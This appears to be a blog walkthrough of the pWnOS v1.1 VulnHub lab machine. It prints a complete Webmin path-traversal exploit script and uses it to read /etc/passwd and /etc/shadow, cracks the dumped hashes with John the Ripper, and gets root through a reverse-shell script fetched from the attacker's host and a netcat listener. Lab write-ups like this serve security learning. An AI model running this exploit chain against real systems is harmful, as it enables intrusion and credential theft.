pWnOS v1.1
9 min readSep 25, 2021
Before starting out the walkthrough, I would like to thank Darknet Dairies for somehow subconsciously make my head itch on looking at something out of order. More on that later. So the download link for pWnOS v1.1 — https://www.vulnhub.com/entry/pwnos-10,33/
Nmap scan
Yeah, a routine checkup of the vulnerable machines, let’s start
$ nmap -p- -T4 -A 192.168.162.144
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 13:24 EDT
Nmap scan report for 192.168.162.144
Host is up (0.0046s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_ 2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h30m05s, deviation: 3h32m08s, median: 4s
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| NetBIOS computer name:
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
|_ System time: 2021-09-24T12:25:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.30 secondsSamba smdb, well the legendary vulnerability of remote buffer-overflow might work.
Okay, so I poked around a lot of it, but with no results at all. So, went on to see the website.
Website
Again, tried inspecting these source code to get some clues, (Just like in CTF, how foolish am I!!) and ended-up in a dead end here as well. So, now is the time for itch on my head.
Recently, listening to Darknet Dairies, I came across an episode about Mimikatz, I don’t remember about that a lot, and it has nothing to do with this box as well. But somehow the port 10000 running Miniserv got me interested and I jumped to that.
Port 10000 — Miniserv
So, right on I started opening the website on this port,
Okay, some credential stuffing might work? May be, you may try that. But I actually started searching for Miniserv exploit in searchsploit.
I know what you are thinking, why searchsploit? why not google?, Well my internet was down at that particular time!! No special reason.
And luckily, I got two exploits related to this particular module. (Lucky break!!)
Gaining access to the mahcine
So, I used 1997.php (Because it’s my birth year!!) and continued with the exploit.
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/
$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {
$z = "/..%01";
for ($i=0;$i<60;$i++) {
$z.="/..%01";
}
$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";
echo "Attacking ".$host."\n";
echo "---------------------------------\n";
// INITIALIZING CURL SESSION TO THE TARGET
$ch = curl_init();
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
$content = curl_exec($ch);
curl_close ($ch);
// CLOSING CURL
// ECHOING THE CONTENT OF THE $FILE
echo $content;
echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";
} else {
// IF INPUT IS NOT CORRECT DISPLAY THE README
echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
echo "Coded by joffer , http://securitydot.net\n";
}
?>
# milw0rm.com [2006-07-09]Saved this code to file named webmin.php, and ran the exploit,
$ cp /usr/share/exploitdb/exploits/multiple/remote/1997.php webmin.php
$ php -f webmin.php 192.168.162.144 10000 http /etc/passwd
$ php -f webmin.php 192.168.162.144 10000 http /etc/shadowpasswd.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bashshadow.txt
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::So, now it’s time for john the ripper.
John the Ripper
But first we have to unshadow the two files into one, and than apply this John!!
$ unshadow hashes.txt shadow.txt > complete_hashes.txt
$ cat complete_hashes.txt
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:!:100:101::/nonexistent:/bin/false
syslog:!:101:102::/home/syslog:/bin/false
klog:!:102:103::/home/klog:/bin/false
mysql:!:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:!:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:1001:1001::/home/obama:/bin/bash
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:1002:1002::/home/osama:/bin/bash
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:1003:1003::/home/yomama:/bin/bashNow, we apply John the Ripper to get our username and password,
$ john --wordlist=/usr/share/wordlists/rockyou.txt complete_hashes.txt 1 ⨯
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 4.27% (ETA: 15:17:29) 0g/s 77897p/s 389583c/s 389583C/s ZAIDA1..Vacation1
0g 0:00:00:12 5.75% (ETA: 15:17:27) 0g/s 78216p/s 391104c/s 391104C/s gordob..goodies15
0g 0:00:00:13 6.26% (ETA: 15:17:26) 0g/s 78247p/s 391325c/s 391325C/s b012689855..azelie
0g 0:00:00:14 6.70% (ETA: 15:17:27) 0g/s 77986p/s 389931c/s 389931C/s 2774629..272389
0g 0:00:00:15 7.15% (ETA: 15:17:28) 0g/s 77664p/s 388396c/s 388396C/s whitterbug..whiteclv2
0g 0:00:00:16 7.66% (ETA: 15:17:27) 0g/s 77513p/s 387621c/s 387621C/s sydneym..syahanim
0g 0:00:00:17 8.16% (ETA: 15:17:27) 0g/s 77240p/s 386268c/s 386268C/s samuelsamuel..samsears1
0g 0:00:00:18 8.63% (ETA: 15:17:27) 0g/s 77008p/s 385040c/s 385040C/s pita64..pisces80
0g 0:00:00:19 9.13% (ETA: 15:17:27) 0g/s 76870p/s 384398c/s 384398C/s my881202..my way
0g 0:00:00:20 9.63% (ETA: 15:17:26) 0g/s 76771p/s 383856c/s 383856C/s maddiexo..madamecurie
0g 0:00:00:21 10.12% (ETA: 15:17:26) 0g/s 76653p/s 383310c/s 383310C/s kitkat86..kisstar
0g 0:00:00:22 10.61% (ETA: 15:17:26) 0g/s 76608p/s 383092c/s 383092C/s jane369..janaira
0g 0:00:01:01 28.95% (ETA: 15:17:29) 0g/s 69903p/s 349528c/s 349528C/s regger...regert
0g 0:00:01:02 29.53% (ETA: 15:17:28) 0g/s 70072p/s 350361c/s 350361C/s raintree21..rainman3
0g 0:00:01:03 30.03% (ETA: 15:17:28) 0g/s 70059p/s 350298c/s 350298C/s pxx277..pxlina
0g 0:00:01:04 30.63% (ETA: 15:17:27) 0g/s 70184p/s 350931c/s 350931C/s powerbooster..power2lc
0g 0:00:01:05 31.18% (ETA: 15:17:27) 0g/s 70247p/s 351248c/s 351248C/s pjtfsagfsb..pjp1691
0g 0:00:01:06 31.72% (ETA: 15:17:27) 0g/s 70302p/s 351517c/s 351517C/s petra140..petney09
0g 0:00:01:07 32.30% (ETA: 15:17:26) 0g/s 70396p/s 352000c/s 352000C/s password0701..passward0
0g 0:00:01:09 33.46% (ETA: 15:17:25) 0g/s 70637p/s 353187c/s 353187C/s offandon01..ofdark99
0g 0:00:01:11 34.58% (ETA: 15:17:24) 0g/s 70848p/s 354248c/s 354248C/s nice9955..nice one
0g 0:00:01:12 35.13% (ETA: 15:17:23) 0g/s 70934p/s 354686c/s 354686C/s nathys09..nathiya1458
0g 0:00:01:33 46.65% (ETA: 15:17:18) 0g/s 71880p/s 359410c/s 359410C/s jye14300..jya57jdr
0g 0:00:01:35 47.79% (ETA: 15:17:17) 0g/s 72003p/s 360015c/s 360015C/s joaqui23..joaoinacio
0g 0:00:01:36 48.29% (ETA: 15:17:17) 0g/s 72034p/s 360178c/s 360178C/s jg33351..jg116217
0g 0:00:01:37 48.83% (ETA: 15:17:17) 0g/s 72053p/s 360279c/s 360279C/s jdm100187..jdkhan2
0g 0:00:01:38 49.33% (ETA: 15:17:17) 0g/s 72047p/s 360246c/s 360246C/s jan31st..jan2549
0g 0:00:01:39 49.86% (ETA: 15:17:17) 0g/s 72068p/s 360347c/s 360347C/s j111486..j106858
0g 0:00:01:40 50.44% (ETA: 15:17:17) 0g/s 72118p/s 360590c/s 360590C/s info5503..infini44
0g 0:00:01:41 51.09% (ETA: 15:17:16) 0g/s 72161p/s 360811c/s 360811C/s ilovedamo69..ilovecujo
0g 0:00:01:42 51.63% (ETA: 15:17:16) 0g/s 72139p/s 360707c/s 360707C/s i851367..i6k5m4n3
0g 0:00:01:43 52.16% (ETA: 15:17:16) 0g/s 72127p/s 360644c/s 360644C/s honey0603..honestluv
0g 0:00:01:44 52.70% (ETA: 15:17:16) 0g/s 72146p/s 360736c/s 360736C/s help9..helomates@
0g 0:00:01:45 53.25% (ETA: 15:17:16) 0g/s 72141p/s 360706c/s 360706C/s halsea..haloo3beta
h4ckm3 (vmware)
1g 0:00:01:46 53.72% (ETA: 15:17:16) 0.009433g/s 72088p/s 360023c/s 360023C/s grizzly63..gritsey
1g 0:00:01:48 55.11% (ETA: 15:17:14) 0.009258g/s 72505p/s 360369c/s 360369C/s gal1005..gajito
1g 0:00:01:49 55.73% (ETA: 15:17:14) 0.009173g/s 72603p/s 360114c/s 360114C/s frances5017..france0730
1g 0:00:01:50 56.36% (ETA: 15:17:14) 0.009090g/s 72720p/s 359950c/s 359950C/s ferreiram..ferrari462
1g 0:00:01:51 56.97% (ETA: 15:17:13) 0.009008g/s 72813p/s 359700c/s 359700C/s exemplo..exclusivesoundz
1g 0:00:01:52 57.58% (ETA: 15:17:13) 0.008927g/s 72898p/s 359430c/s 359430C/s emz42889..emylouis2
1g 0:00:01:53 58.30% (ETA: 15:17:12) 0.008848g/s 73114p/s 359690c/s 359690C/s edwardam..edward0425
1g 0:00:01:54 58.94% (ETA: 15:17:12) 0.008771g/s 73283p/s 359782c/s 359782C/s drewwasere..drewnellie
1g 0:00:01:55 59.55% (ETA: 15:17:12) 0.008694g/s 73388p/s 359618c/s 359618C/s dj1419..dj072488
1g 0:00:01:56 60.16% (ETA: 15:17:11) 0.008619g/s 73458p/s 359325c/s 359325C/s derbycity1..derakh69
1g 0:00:01:57 60.80% (ETA: 15:17:11) 0.008546g/s 73586p/s 359282c/s 359282C/s darvin_3..dartmouth372
1g 0:00:02:14 71.65% (ETA: 15:17:06) 0.007462g/s 75162p/s 357344c/s 357344C/s aldrenjinky..aldomoxoteadoro
1g 0:00:02:15 72.27% (ETA: 15:17:05) 0.007406g/s 75262p/s 357328c/s 357328C/s adriano0309..adrianita9443
1g 0:00:02:16 72.86% (ETA: 15:17:05) 0.007352g/s 75326p/s 357179c/s 357179C/s a5b7j3a..a576255
1g 0:00:02:17 73.40% (ETA: 15:17:05) 0.007298g/s 75332p/s 356791c/s 356791C/s VICTORIA!..VICHORARO
1g 0:00:02:18 74.03% (ETA: 15:17:05) 0.007246g/s 75433p/s 356792c/s 356792C/s Shamarri..Shaicai
1g 0:00:02:19 74.61% (ETA: 15:17:05) 0.007194g/s 75482p/s 356593c/s 356593C/s ROSARED..RORO06
1g 0:00:02:20 75.08% (ETA: 15:17:05) 0.007142g/s 75407p/s 355901c/s 355901C/s PAULCHRISTIAN..PATTY3107
1g 0:00:02:21 75.71% (ETA: 15:17:05) 0.007092g/s 75500p/s 355892c/s 355892C/s MZGOLLIDAY..MZ.PRUITT
1g 0:00:02:22 76.37% (ETA: 15:17:04) 0.007041g/s 75633p/s 356038c/s 356038C/s LILNIQ90..LILMEATBALL7
1g 0:00:02:23 76.97% (ETA: 15:17:04) 0.006992g/s 75702p/s 355937c/s 355937C/s Jackdee55..Jacinda11
1g 0:00:02:24 77.58% (ETA: 15:17:04) 0.006944g/s 75774p/s 355858c/s 355858C/s HOMEGIRL11..HOLLY16
1g 0:00:02:25 78.19% (ETA: 15:17:04) 0.006896g/s 75845p/s 355783c/s 355783C/s EV3491..EUAN0916
1g 0:00:02:26 78.72% (ETA: 15:17:04) 0.006849g/s 75838p/s 355399c/s 355399C/s Crawbaby19..Crabucawoog
1g 0:00:02:27 79.40% (ETA: 15:17:04) 0.006802g/s 75971p/s 355570c/s 355570C/s BRYTT8298..BRWNEYESW5894
1g 0:00:02:28 80.00% (ETA: 15:17:03) 0.006756g/s 76028p/s 355448c/s 355448C/s ALLY1826..ALLF!EN
1g 0:00:02:29 80.70% (ETA: 15:17:03) 0.006711g/s 76109p/s 355430c/s 355430C/s 974685..97446015763285
1g 0:00:02:30 81.18% (ETA: 15:17:03) 0.006666g/s 76069p/s 354930c/s 354930C/s 93010615..92valleyview
1g 0:00:02:31 81.79% (ETA: 15:17:03) 0.006622g/s 76166p/s 354983c/s 354983C/s 8842973..884049
1g 0:00:02:32 82.37% (ETA: 15:17:03) 0.006578g/s 76261p/s 355033c/s 355033C/s 81151128..8112a
1g 0:00:02:33 83.00% (ETA: 15:17:03) 0.006535g/s 76407p/s 355285c/s 355285C/s 7405597..7402914
1g 0:00:02:34 83.60% (ETA: 15:17:03) 0.006493g/s 76522p/s 355426c/s 355426C/s 6677901..667584
1g 0:00:02:35 84.24% (ETA: 15:17:03) 0.006451g/s 76677p/s 355727c/s 355727C/s 596208a..596013
1g 0:00:02:36 84.85% (ETA: 15:17:02) 0.006410g/s 76812p/s 355960c/s 355960C/s 5368615..5366888
1g 0:00:02:37 85.48% (ETA: 15:17:02) 0.006369g/s 76927p/s 356106c/s 356106C/s 4910051..490810357
1g 0:00:02:38 86.11% (ETA: 15:17:02) 0.006329g/s 77061p/s 356338c/s 356338C/s 436012..435822
1g 0:00:02:41 87.90% (ETA: 15:17:02) 0.006210g/s 77320p/s 356475c/s 356475C/s 297386..2971708
1g 0:00:02:46 91.35% (ETA: 15:17:00) 0.006023g/s 78010p/s 357813c/s 357813C/s 164352456..16417625
1g 0:00:02:47 92.05% (ETA: 15:17:00) 0.005988g/s 78137p/s 358051c/s 358051C/s 1341700043469..134078c
1g 0:00:02:48 92.76% (ETA: 15:17:00) 0.005952g/s 78245p/s 358208c/s 358208C/s 11ons00..11mt43bg
1g 0:00:02:49 93.44% (ETA: 15:16:59) 0.005916g/s 78343p/s 358332c/s 358332C/s 10007701mf..1000185
1g 0:00:02:50 94.19% (ETA: 15:16:59) 0.005882g/s 78454p/s 358512c/s 358512C/s 09099497799..090985870
1g 0:00:02:51 94.93% (ETA: 15:16:59) 0.005847g/s 78543p/s 358605c/s 358605C/s 0869290132..0869228856
1g 0:00:02:53 96.45% (ETA: 15:16:58) 0.005780g/s 78737p/s 358868c/s 358868C/s 0810201160..0810139082
1g 0:00:02:54 97.13% (ETA: 15:16:58) 0.005747g/s 78811p/s 358909c/s 358909C/s 06666660..066607218
1g 0:00:02:55 97.79% (ETA: 15:16:57) 0.005713g/s 78881p/s 358937c/s 358937C/s 044331048..044284515
1g 0:00:02:56 98.43% (ETA: 15:16:57) 0.005681g/s 78943p/s 358941c/s 358941C/s 026008..025941484
1g 0:00:02:57 99.13% (ETA: 15:16:57) 0.005649g/s 79022p/s 359015c/s 359015C/s 0122261297..012209647
1g 0:00:02:58 99.90% (ETA: 15:16:57) 0.005617g/s 79134p/s 359220c/s 359220C/s #bommel85..#Berloul
1g 0:00:02:58 DONE (2021-09-24 15:16) 0.005612g/s 79142p/s 359216c/s 359216C/s ejngyhga007..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completedSo, we got it, Username — vmware, Password — h4ckm3
SSH Login
Okay, we got in but we aren’t the root yet. Time for some PrivEsc.
Privilege Escalation
We are in the system, so let’s just use the same php code on the remote system to get a reverse shell to our system.
In the Kali machine,
$ cp /usr/share/exploitdb/exploits/multiple/remote/1997.php rshell.cgi
$ nano rshell.cgiChange the following lines on the code,
Than it’s time to open the Kali machine and wget the rshell.cgi code from the target. In the Kali terminal,
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.162.144 - - [25/Sep/2021 03:10:18] "GET /rshell.cgi HTTP/1.0" 200 -This will open up the Kali machine at port 8000 and we can now get to the target machine and wget the rshell.
vmware@ubuntuvm:~$ wget http://192.168.162.128:8000/rshell.cgi
--02:10:22-- http://192.168.162.128:8000/rshell.cgi
=> `rshell.cgi'
Connecting to 192.168.162.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,718 (3.6K) [application/octet-stream]
100%[=================================================================================================================================>] 3,718 --.--K/s
02:10:22 (980.30 MB/s) - `rshell.cgi' saved [3718/3718]
Once we got the rshell.cgi on the remote machine, we can start our PrivEcs exploit. Let’s start by chmod the rshell.cgi on the remote machine.
vmware@ubuntuvm:~$ chmod +x rshell.cgiOn the Kali terminal, start listening at port 4444,
$ nc -nvlp 4444
listening on [any] 4444 ...Open up another Kali terminal and execute the following command,
$ php -f webmin.php 192.168.162.144 10000 http /home/vmware/rshell.cgi
And, finally we got the Root. Hurry!!
